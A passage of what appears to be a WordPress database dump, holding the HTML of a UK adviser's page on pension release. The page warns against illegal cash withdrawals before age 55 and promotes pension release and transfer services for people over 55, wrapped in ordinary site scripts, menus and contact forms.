&#13;\r\n		&#13;\r\n		&#13;\r\n				</p>\r\n<p>\r\n</p>\r\n<p class=\"email\">Email: <a href=\"mailto:enquiries@equalitywalk.org.uk\">Click To Email</a></p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n		&#13;\r\n				&#13;\r\n				</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n		</p>\r\n<p>\r\n</p>\r\n<div style=\"clear:both;\"/></div>\r\n<p>\r\n</article>\r\n<p>\r\n</p>\r\n<article class=\"col\">\r\n</p>\r\n<div style=\"clear:both;\"/></article>\r\n<p>\r\n</section>\r\n<p>\r\n</div>\r\n<p>\r\n</p>\r\n<p>				&#13;\r\n&#13;\r\n				</p>\r\n<p>\r\n</p>\r\n<article class=\"col last\"/></footer>\r\n<p>\r\n</div>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n	&#13;\r\n			</p>\r\n<p>\r\n</p>\r\n<footer id=\"footer\">\r\n</p>\r\n<div class=\"avada-row\"/>&#13;\r\n	</footer>\r\n<p>\r\n</p>\r\n<p><!-- wrapper --><script type=\"text/javascript\" src=\"../maps/api/js_v_3.exp_amp_sensor_false_amp_language_en.js\"/><!-- W3TC-include-js-head --><script type=\"text/javascript\"><![CDATA[ jQuery(window).load(function() { jQuery( \'#wooslider-id-1\' ).flexslider2({namespace: \"wooslider-\" , animation: \'fade\', slideshowSpeed: 7000, animationSpeed: 600, slideshow: true, directionNav: true, keyboard: false, mousewheel: false, pausePlay: false, randomize: false, animationLoop: true, pauseOnAction: true, pauseOnHover: false, smoothHeight: false, touch: true, controlNav: true}); }); ]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.form.min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */ var _wpcf7 = {\"loaderUrl\":\"http://www.equalitywalk.org.uk/wp-content/plugins/contact-form-7/images/ajax-loader.gif\",\"sending\":\"Sending ...\",\"cached\":\"1\"}; /* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/contact-form-7/includes/js/scripts.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/swfupload.min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */ var iphormL10n = {\"error_submitting_form\":\"An error occurred submitting the form\",\"swfupload_flash_url\":\"http://www.equalitywalk.org.uk/wp-includes/js/swfupload/swfupload.swf\",\"swfupload_upload_url\":\"http://www.equalitywalk.org.uk/?iphorm_swfupload=1\",\"swfupload_too_many\":\"You have attempted to queue too many files\",\"swfupload_file_too_big\":\"This file exceeds the maximum upload size\",\"swfupload_file_empty\":\"This file is empty\",\"swfupload_file_type_not_allowed\":\"This file type is not allowed\",\"swfupload_unknown_queue_error\":\"Unknown queue error, please try again later\",\"swfupload_upload_error\":\"Upload error\",\"swfupload_upload_failed\":\"Upload failed\",\"swfupload_server_io\":\"Server IO error\",\"swfupload_security_error\":\"Security error\",\"swfupload_limit_exceeded\":\"Upload limit exceeded\",\"swfupload_validation_failed\":\"Validation failed\",\"swfupload_upload_stopped\":\"Upload stopped\",\"swfupload_unknown_upload_error\":\"Unknown upload error\",\"plugin_url\":\"http://www.equalitywalk.org.uk/wp-content/plugins/iphorm-form-builder\",\"preview_no_submit\":\"The form cannot be submitted in the preview\"}; /* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.iphorm.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.smooth-scroll.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/qtip2/jquery.qtip.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/fancybox/jquery.fancybox-1.3.4.pack.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/uniform/jquery.uniform.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.infieldlabel.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/themes/light/rounded.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.mousewheel.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.flexslider.min.js\"/><script type=\"text/javascript\" src=\"../wp-includes/js/comment-reply.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/modernizr-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.carouFredSel-6.2.1-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.prettyPhoto-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.flexslider-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.fitvids-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/gmap-min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar js_local_vars = {\"dropdown_goto\":\"Go to...\",\"mobile_nav_cart\":\"Shopping Cart\",\"page_smoothHeight\":\"false\",\"flex_smoothHeight\":\"false\",\"language_flag\":\"ICL_LANGUAGE_CODE\",\"infinite_blog_finished_msg\":\"<em>All posts displayed</em>\",\"infinite_blog_text\":\"<em>Loading the next set of posts...</em>\",\"portfolio_loading_text\":\"<em>Loading Portfolio Items...</em>\",\"faqs_loading_text\":\"<em>Loading FAQ Items...</em>\",\"order_actions\":\"Details\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script src=\"../wp-content/themes/Avada/js/main.js\" type=\"text/javascript\">// <![CDATA[\r\n<script type=\"text/javascript\" src=\"../wp-content/plugins/js_composer/assets/js/js_composer_front.js\"/></body></p>\r\n<p>\r\n// ]]></script></div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','April 2018 Stock Market Bulletin','Read about','inherit','closed','closed','','47-revision-v1','','','2017-09-21 17:34:37','2017-09-21 17:34:37','',47,'http://www.equalitywalk.org.uk/47-revision-v1',0,'revision','',0),(325,1,'2017-09-21 17:35:12','2017-09-21 17:35:12','<body class=\"single single-post postid-776 single-format-standard light  wpb-js-composer js-comp-ver-3.5.4 vc_responsive\">&#13;\n&#13;\n&#13;\n&#13;\n&#13;\n	<div id=\"wrapper\">&#13;\n					<div class=\"header-wrapper\">&#13;\n			<div class=\"header-v2\">&#13;\n		&#13;\n		<header id=\"header\"><div class=\"avada-row\" style=\"margin-top:0px;margin-bottom:0px;\">&#13;\n			&#13;\n						<nav id=\"nav\" class=\"nav-holder\"><ul id=\"navigation\" class=\"menu\"><li id=\"menu-item-7214\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-7214\"><a href=\"../wealth-management/\">Wealth Management</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-44\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-44\"><a href=\"../wealth-platform/\">Wealth Platform</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-27\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-27\"><a href=\"../pensions/\">Pensions</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-967\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-967\"><a href=\"../pensions/pension-release/\">Pension Release</a></li>&#13;\n	<li id=\"menu-item-741\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-741\"><a href=\"../pensions/pension-transfer/\">Pension Transfer</a></li>&#13;\n	<li id=\"menu-item-136\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-136\"><a href=\"../pensions/auto-enrolment-pensions/\">Auto Enrolment Pensions</a>&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-6494\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6494\"><a href=\"../auto-enrolment-report/\">Auto Enrolment Report</a></li>&#13;\n	</ul></li>&#13;\n	<li id=\"menu-item-95\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-95\"><a href=\"../pensions/sipps/\">SIPPS</a></li>&#13;\n	<li id=\"menu-item-105\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-105\"><a href=\"../pensions/stakeholder-pensions/\">Stakeholder Pensions</a></li>&#13;\n	<li id=\"menu-item-127\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-127\"><a href=\"../pensions/occupational-pensions/\">Occupational Pensions</a></li>&#13;\n	<li id=\"menu-item-6154\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6154\"><a href=\"../pension-review/\">Pension Review</a></li>&#13;\n	<li id=\"menu-item-133\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-133\"><a href=\"../pensions/group-pension-plan/\">Group Pension Plan</a></li>&#13;\n	<li id=\"menu-item-139\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-139\"><a href=\"../pensions/income-drawdown/\">Income Drawdown</a></li>&#13;\n	<li id=\"menu-item-6852\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-6852\"><a>More Information</a>&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-6848\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6848\"><a href=\"../tracking-down-your-lost-pension/\">Lost Pension</a></li>&#13;\n	</ul></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-47\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-47\"><a href=\"..\">Investments</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-121\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-121\"><a href=\"..isas/\">ISAs</a></li>&#13;\n	<li id=\"menu-item-118\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-118\"><a href=\"..lump-sum-investment/\">Lump Sum Investment</a></li>&#13;\n	<li id=\"menu-item-102\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-102\"><a href=\"..offshore-bonds/\">Offshore Bonds</a></li>&#13;\n	<li id=\"menu-item-124\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-124\"><a href=\"..unit-trusts-oeics/\">Unit Trusts &amp; OEICs</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-46\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-46\"><a href=\"../\">Trusts</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-108\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-108\"><a href=\"../asset-protection-trust/\">Asset Protection Trust</a></li>&#13;\n	<li id=\"menu-item-114\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-114\"><a href=\"../discretionary-\">Discretionary Trusts</a></li>&#13;\n	<li id=\"menu-item-115\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-115\"><a href=\"../absolute-\">Absolute Trusts</a></li>&#13;\n	<li id=\"menu-item-143\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-143\"><a href=\"../gift-loan-schemes/\">Gift &amp; Loan Trust</a></li>&#13;\n	<li id=\"menu-item-146\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-146\"><a href=\"../wills-and-trust/\">Wills and Trust</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-3381\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-3381\"><a href=\"../insurance-protection/\">Insurance</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-3535\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-3535\"><a href=\"../critical-illness-insurance-2-0/\">Critical Illness</a></li>&#13;\n	<li id=\"menu-item-3585\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-3585\"><a href=\"../serious-illness-cover/\">Serious Illness</a></li>&#13;\n	<li id=\"menu-item-4633\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-4633\"><a href=\"../relevant-life-plan/\">Relevant Life Plan</a></li>&#13;\n	<li id=\"menu-item-7228\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7228\"><a href=\"../life-insurance/\">Life Insurance</a></li>&#13;\n	<li id=\"menu-item-7243\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7243\"><a href=\"../business-protection-insurance/\">Business Protection</a></li>&#13;\n</ul></li>&#13;\n		</ul></nav><div class=\"mobile-nav-holder main-menu\"/>&#13;\n					</div>&#13;\n	</header></div>		</div>&#13;\n				<div id=\"sliders-container\">&#13;\n										</div>&#13;\n					<div class=\"page-title-container\">&#13;\n		<div class=\"page-title\">&#13;\n			<div class=\"page-title-wrapper\">&#13;\n				<div class=\"page-title-captions\">&#13;\n										<h1 class=\"entry-title\">&#13;\n										Can I sell my Pension under 55?										</h1>&#13;\n														</div>&#13;\n															<ul class=\"breadcrumbs\"><li> <a href=\"/\">Home</a></li><li><a href=\"../category/pensions/\" title=\"Pensions\">Pensions</a></li><li>Can I sell my Pension under 55?</li></ul></div>&#13;\n		</div>&#13;\n	</div>&#13;\n													<div id=\"main\" class=\"clearfix \" style=\"\">&#13;\n		<div class=\"avada-row\" style=\"\">&#13;\n					<div id=\"content\" class=\"full-width\" style=\"width:100%\">&#13;\n												<div id=\"post-776\" class=\"post-776 post type-post status-publish format-standard hentry category-pensions post\">&#13;\n												<div class=\"post-content\">&#13;\n				<div class=\"wpb_row vc_row-fluid \"> &#13;\n	<div class=\"vc_span3 wpb_column column_container\">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			 &#13;\n	<div class=\"wpb_text_column wpb_content_element \">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			&#13;\n<h2>FAS<a href=\"#\"/>T FACTS</h2>&#13;\n<p> </p>&#13;\n<p><span style=\"color: #000000;\">#1: </span><span style=\"color: #000000;\">It’s</span> illegal to take money out of your pension fund before you are 55 years old.</p>&#13;\n<p><span style=\"color: #000000;\">#2: </span>There are dubious companies out there who will tell you otherwise – but it is against the law.</p>&#13;\n<p><span style=\"color: #000000;\">#3:</span>  With a pension release, you can set free up to 25% of your pension fund in cash if you are over 55 and meet the criteria.</p>&#13;\n<p><span style=\"color: #000000;\">#4: </span>You could use this to pay off debt, take a dream holiday, treat your children – anything you wish.</p>&#13;\n<p><span style=\"color: #000000;\">#5: </span>Equity SMART can answer all your questions when it comes to <a href=\"../pensions/pension-release/\" target=\"_blank\">pension release</a> – all you have to do is ask.</p>&#13;\n&#13;\n		</div> &#13;\n	</div>  &#13;\n	<div class=\"wpb_text_column wpb_content_element \">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			&#13;\n<p> </p>&#13;\n<p> </p>&#13;\n&#13;\n		</div> &#13;\n	</div>  &#13;\n		</div> &#13;\n	</div> &#13;\n &#13;\n	<div class=\"vc_span9 wpb_column column_container\">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			 &#13;\n	<div class=\"wpb_text_column wpb_content_element \">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			&#13;\n<h2><span style=\"color: #000000;\">IF YOU WANT TO RELEASE CASH FROM YOUR PENSION – READ THIS FIRST!</span></h2>&#13;\n<p>Firstly, it is <span style=\"color: #ff0000;\">illegal</span> to take money out of a pension fund before you reach the age of 55.</p>&#13;\n<p><big>By  Strategic Development Director Equity SMART</big></p>&#13;\n<hr/></div> &#13;\n	</div>  &#13;\n	<div class=\"wpb_text_column wpb_content_element \">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			&#13;\n<p><big>This is despite all the information you may find online telling you different through many dubious offers of cash backs, loans and all sorts of offshore schemes – with little attention paid to the pension rules and consequences to you.</big></p>&#13;\n<p><big>But don’t take our word for it. See what this recent update from the <a href=\"http://www.thepensionsregulator.gov.uk/press/pn12-05.aspx\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-article\',\'http://www.thepensionsregulator.gov.uk\']);\" target=\"_blank\">Pensions Regulator</a> says with regard to pension release before the age of 55.</big></p>&#13;\n<div class=\"wpb_alert wpb_content_element  wpb_alert-error\">&#13;\n<div class=\"messagebox_text\">&#13;\n<p><big>The Pension Schemes usually claim to be able to access your pension before the age of 55 and do this through overseas transfers, overseas investments or by way of a loan from your existing arrangement. All versions can incur high fees, potential charges and penalties from HMRC and they stray into illegal dealings when concerning pensions. Not only that, but they leave the consumer with little or no pension provision in retirement.</big></p>&#13;\n</div>&#13;\n</div>&#13;\n<p><big>So – you might now be wondering</big> <big>if there is any way in which you <em>can</em> cash in some or all of your pension before you reach 55. For most people – it’s a straight ‘no’.</big></p>&#13;\n<p><big>The cases in which it can legally occur are based on a few specific individual circumstances.</big></p>&#13;\n<p><big>One of these is the unfortunate predicament of having to retire early due to ill health for example having a terminal illness. Or it may be due to a pension scheme that relates to a specific form of employment – for instance in the armed forces, or professional football – where the career-spans are relatively short.</big></p>&#13;\n<p><big>Or it might be that you bought a specialised pension scheme that contains a right to access the cash from the age of 50. They do exist – </big></p>&#13;\n<p><big>So it’s well worth checking through the terms and conditions of your pension plan and we would recommend that you get in touch with your own pension provider to discuss your options.  </big></p>&#13;\n<p><big>But what are the potential consequences to consumers who transfer their pension and release via these unregulated companies?</big></p>&#13;\n<blockquote>&#13;\n<ul><li><big>Individuals are likely to be poorer in retirement. This is based on both the impact of releasing cash and the potential of high losses on the balance of the pension pot which has been eroded by unnecessary high charges.</big></li>&#13;\n<li><big>They may also face substantial tax charges and penalties from HMRC. These would be based on generous tax reliefs having been misused on pensions already built up.</big></li>&#13;\n<li><big>Still not convinced? please see <a href=\"http://www.pensionsadvisoryservice.org.uk/media/826600/members_leaflet.pdf\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'download\',\'http://www.pensionsadvisoryservice.org.uk/media/826600/members_leaflet.pdf\']);\" target=\"_blank\">latest consumer advice leaflet</a> it has all the detail you need to know.</big></li>&#13;\n</ul></blockquote>&#13;\n<p><big>So we know the position for those under age 55 – but what about everyone else?</big></p>&#13;\n<h5>That’s what understanding pension release is all about… balance</h5>&#13;\n<p><big>We understand it’s a tough economy with the finances of many consumers stretched to the limit. In these times of need you may find yourself tempted to reach out to almost anyone who is saying that they can offer help.</big></p>&#13;\n<p><big>This is certainly the case with <span style=\"text-decoration: underline;\">unregulated online pension release companies</span> who are working outside the rules by offering what appear to be legitimate schemes to unlock cash from your pension while you are under the age of 55 – leaving you with no protection from the Financial Services Compensation Scheme.</big></p>&#13;\n<h5><span style=\"padding: 0px 4px; background-color: #fdf957;\">So has this got you worrying about the pension scheme you’re currently in?</span></h5>&#13;\n<p><big>It could be that you are one of the scant few people in a position to withdraw money from your pension prior to your 55th birthday. Or you may now be holding onto your pension ready to set it free on the big day! But is that really the right choice for you?</big></p>&#13;\n<p><big>Take a look at your current pension scheme.</big> <big>If you want to improve on poor investment returns and reduce unnecessary charges that are eroding your pension pot – then maybe a <a href=\"../pensions/pension-transfer/\" target=\"_blank\">pension transfer</a> is a wiser option for you at this stage.</big></p>&#13;\n<p><big>We can help by analysing your current plan alongside others that are out there – and see if we can find you a better return. Our experienced and personal touch means it’s a lot easier to achieve than you might think – so why not get in contact and see how a pension transfer could potentially set you up for a better future.</big></p>&#13;\n<p><big>So – given all the stories in the media and the information outlined above, you might be coming to the conclusion that a pension release is a bad choice for everyone – but that is simply not the case.</big></p>&#13;\n<h2>If you are <span style=\"text-decoration: underline;\">over</span> 55 – it could be good news!</h2>&#13;\n<p><big>Unlocking cash from your pension can be an excellent opportunity to make a real difference towards making you more financially secure, at a time in your life when you need it most.</big></p>&#13;\n<p><big>What we are about to tell you is NOT “theory”, unregulated or illegal. These are practical, reliable strategies proven to help you release cash from your pension today that can change your life for the better.</big></p>&#13;\n<blockquote><p><big>In order to qualify for Pension Release, you must satisfy the following criteria:</big></p>&#13;\n<ul><li><big>You must be aged between 55 and 75</big></li>&#13;\n<li><big>You must have pension benefits other than your State Pension</big></li>&#13;\n<li><big>You cannot be in receipt of these pension benefits already</big></li>&#13;\n<li><big>You pension benefits cannot relate to your current employer</big></li>&#13;\n</ul></blockquote>&#13;\n<h2>If you have answered YES to these Criteria…</h2>&#13;\n<p><big>Then you may be interested in the extraordinary opportunity to  release up to 25% of your pension fund in cash – money that you can use for any number of reasons:</big></p>&#13;\n<p><big>Paying off debt. Paying a lump sum off a mortgage. A dream holiday. Or maybe to pay for a family wedding…</big></p>&#13;\n<p><big>Of course the list is endless in the practical application of your new found cash but we find that clients experience much more than this – they achieve one or any number of the following things.</big></p>&#13;\n<div class=\"wpb_alert wpb_content_element  wpb_alert-success\">&#13;\n<div class=\"messagebox_text\">&#13;\n<ul><li><big>The beginning of a fresh start and the antidote to experiencing less hassle, strain, anxiety and aggravation in their lives.</big></li>&#13;\n<li><big>Having the choice to change life for the better – possibly choosing to work less thanks to now being able to top up other employed income.</big></li>&#13;\n<li><big>Ensuring they don’t miss out on important time with their family, children and grandchildren.</big></li>&#13;\n<li><big>Changing their future through financial liberty that provides true freedom.</big></li>&#13;\n<li><big>Being able to do more things that you wanted to do but never had the time or income.</big></li>&#13;\n</ul></div>&#13;\n</div>&#13;\n<p><big>Pension Release doesn’t have to be all doom and gloom. We work hard all our lives to give us nice things to look forward to, and you should ask yourself whether you’ll get more enjoyment from releasing money early rather than leaving it in a pension fund.</big></p>&#13;\n<p><big>Some of those dreams may be be restricted in the later years, possibly due to ill health or family commitments.</big></p>&#13;\n<p><big>So… you have a golden box worth <span style=\"color: #ff6600;\">25%</span> of your pension pot available now after being locked away for years.</big></p>&#13;\n<p><big>The only thing to do now is find a trustworthy advisor who will not only safely release the money you need if suitable, but will work extremely hard to manage the money you have left in your pension so you can still retire with the knowledge that you won’t be left short.</big></p>&#13;\n<p><big>You’ll be so glad that you didn’t wait until you were 65 to make the most of your pension and realise your dreams now while you still have them!</big></p>&#13;\n<p><big>Click the button below to send us a message and we will get back to you as soon as we possibly can.</big></p>&#13;\n<p><big> Warmest Regards</big></p>&#13;\n<p><strong style=\"line-height: 1.5em;\"><big/></strong></p>&#13;\n&#13;\n		</div> &#13;\n	</div>  <div class=\"wpb_separator wpb_content_element \"/>&#13;\n <div class=\"wpb_call_to_action wpb_content_element clearfix cta_align_right\"><a class=\"wpb_button_a\" href=\"../pensions/pension-release/\"><span class=\"wpb_button  wpb_btn-success wpb_btn-large\">Get Started Today</span></a><h2 class=\"wpb_call_text\">Find Out More About Pension Release Here...</h2></div> &#13;\n &#13;\n		</div> &#13;\n	</div> &#13;\n </div> <div class=\"wpb_row vc_row-fluid \"> &#13;\n	<div class=\"vc_span6 wpb_column column_container\">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			 &#13;\n	<div class=\"wpb_text_column wpb_content_element \">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			&#13;\n<p>Monthly Articles &amp; Information</p>&#13;\n<p>Keep up with the latest annuity news and articles with a useful newsletter from Equity SMART.</p>&#13;\n<p>You’ll be given lots of valuable information on wealth management news and products. Sign up now and get a copy of our Smart Money guide FREE. Just enter your email below:</p>&#13;\n<div class=\"wpcf7\" id=\"wpcf7-f2512-p776-o1\"><form action=\"../can-i-sell-my-pension-under-55/\" method=\"post\" class=\"wpcf7-form\" novalidate=\"novalidate\">&#13;\n<div style=\"display: none;\">&#13;\n<input type=\"hidden\" name=\"_wpcf7\" value=\"2512\"/><input type=\"hidden\" name=\"_wpcf7_version\" value=\"3.7.1\"/><input type=\"hidden\" name=\"_wpcf7_locale\" value=\"\"/><input type=\"hidden\" name=\"_wpcf7_unit_tag\" value=\"wpcf7-f2512-p776-o1\"/><input type=\"hidden\" name=\"_wpnonce\" value=\"db06ac6257\"/></div>&#13;\n<p>Your Email (required)<br/><span class=\"wpcf7-form-control-wrap your-email\"><input type=\"email\" name=\"your-email\" value=\"\" size=\"30\" class=\"wpcf7-form-control wpcf7-text wpcf7-email wpcf7-validates-as-required wpcf7-validates-as-email\" aria-required=\"true\" aria-invalid=\"false\"/></span> </p>&#13;\n<p><input type=\"submit\" value=\"Download\" class=\"wpcf7-form-control wpcf7-submit\"/></p>&#13;\n<div class=\"wpcf7-response-output wpcf7-display-none\"/></form></div>&#13;\n&#13;\n		</div> &#13;\n	</div>  &#13;\n	<div class=\"wpb_text_column wpb_content_element \">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			&#13;\n<p style=\"text-align: center;\"><em><span style=\"font-size: medium;\">A Guide To…</span></em></p>&#13;\n<p style=\"text-align: center;\"><span style=\"font-size: large;\">Achieving Financial Independence</span></p>&#13;\n<p style=\"text-align: center;\"><img style=\"border: currentColor !important; background-color: transparent !important;\" alt=\"\" src=\"../wp-content/plugins/InstaBuilder/images/graphics/arrow-3.png\" width=\"131\" height=\"72\" border=\"0\"/></p>&#13;\n<p style=\"text-align: center;\"/><div class=\"wpcf7\" id=\"wpcf7-f3692-p776-o2\"><form action=\"../can-i-sell-my-pension-under-55/\" method=\"post\" class=\"wpcf7-form\" novalidate=\"novalidate\">&#13;\n<div style=\"display: none;\">&#13;\n<input type=\"hidden\" name=\"_wpcf7\" value=\"3692\"/><input type=\"hidden\" name=\"_wpcf7_version\" value=\"3.7.1\"/><input type=\"hidden\" name=\"_wpcf7_locale\" value=\"\"/><input type=\"hidden\" name=\"_wpcf7_unit_tag\" value=\"wpcf7-f3692-p776-o2\"/><input type=\"hidden\" name=\"_wpnonce\" value=\"7881f1ec77\"/></div>&#13;\n<p/>&#13;\n<p>First Name<br/><span class=\"wpcf7-form-control-wrap firstname\"><input type=\"text\" name=\"firstname\" value=\"\" size=\"18\" class=\"wpcf7-form-control wpcf7-text wpcf7-validates-as-required\" aria-required=\"true\" aria-invalid=\"false\"/></span></p>&#13;\n<p>Your Email (required)<br/><span class=\"wpcf7-form-control-wrap your-email\"><input type=\"email\" name=\"your-email\" value=\"\" size=\"18\" class=\"wpcf7-form-control wpcf7-text wpcf7-email wpcf7-validates-as-required wpcf7-validates-as-email\" aria-required=\"true\" aria-invalid=\"false\"/></span> </p>&#13;\n<p><input type=\"hidden\" name=\"_wpcf7_captcha_challenge_captcha-357\" value=\"1786803610\"/><br/><span class=\"wpcf7-form-control-wrap captcha-357\"><input type=\"text\" name=\"captcha-357\" value=\"\" size=\"18\" class=\"wpcf7-form-control wpcf7-captchar\" aria-invalid=\"false\"/></span></p>&#13;\n<p><input type=\"submit\" value=\"Download\" class=\"wpcf7-form-control wpcf7-submit\"/></p>&#13;\n<div class=\"wpcf7-response-output wpcf7-display-none\"/></form></div>&#13;\n&#13;\n		</div> &#13;\n	</div>  &#13;\n		</div> &#13;\n	</div> &#13;\n &#13;\n	<div class=\"vc_span6 wpb_column column_container\">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			 &#13;\n	<div class=\"wpb_text_column wpb_content_element \">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			&#13;\n<p> </p>&#13;\n<p><span style=\"color: #99cc00;\">  </span></p>&#13;\n<p>Strategic Development Director </p>&#13;\n<p/>&#13;\n<p> </p>&#13;\n<p>Sam is a respected leadership authority, finance &amp; insurance expert, writer and marketer.</p>&#13;\n<p>His success through some of the worst economies is built upon a lifetime of accomplishment and first hand experiences including, building from start up to one of the leading pioneers and multi award winning providers of mortgage and insurance services to UK consumers derived over the Internet.</p>&#13;\n<p><span style=\"line-height: 1.5em;\">Sam has dedicated his life to challenging conventional wisdom that consumers are not engaged with Financial Services, he believes they are, it’s just that we sell promises – with some products the customer can be confident of delivery but not with all products – we over focus on price and then complain when consumers do.</span></p>&#13;\n<p><span style=\"line-height: 1.5em;\">This lack of clarity and mixed messages stifles innovation, transparency and consumer trust.</span></p>&#13;\n&#13;\n		</div> &#13;\n	</div>  &#13;\n		</div> &#13;\n	</div> &#13;\n </div>&#13;\n							</div>&#13;\n						<div class=\"meta-info\">&#13;\n				<div class=\"alignleft vcard\">&#13;\n					<span class=\"fn\">By <a href=\"../author/paul/\" title=\"Posts by Becky Barnet\" rel=\"author\"/></span><span class=\"sep\">|</span><a href=\"../category/pensions/\" title=\"View all posts in Pensions\" rel=\"category tag\">Pensions</a><span class=\"sep\">|</span><a href=\"../can-i-sell-my-pension-under-55/\" title=\"Comment on Can I sell my Pension under 55?\">0 Comments</a>				</div>&#13;\n			</div>&#13;\n												<div class=\"share-box\">&#13;\n				<h4> </h4>&#13;\n				<ul class=\"social-networks social-networks-dark\"><li class=\"facebook\">&#13;\n						<a href=\"http://www.facebook.com/sharer.php?s=100&amp;p[url]=http://www.equalitywalk.org.uk/can-i-sell-my-pension-under-55/&amp;p[title]=Can%20I%20sell%20my%20Pension%20under%2055?\" target=\"_blank\">&#13;\n							Facebook&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Facebook</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"twitter\">&#13;\n						<a href=\"http://twitter.com/home?status=Can%20I%20sell%20my%20Pension%20under%2055?%20http://www.equalitywalk.org.uk/can-i-sell-my-pension-under-55/\" target=\"_blank\">&#13;\n							Twitter&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Twitter</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"linkedin\">&#13;\n						<a href=\"http://linkedin.com/shareArticle?mini=true&amp;url=http://www.equalitywalk.org.uk/can-i-sell-my-pension-under-55/&amp;title=Can%20I%20sell%20my%20Pension%20under%2055?\" 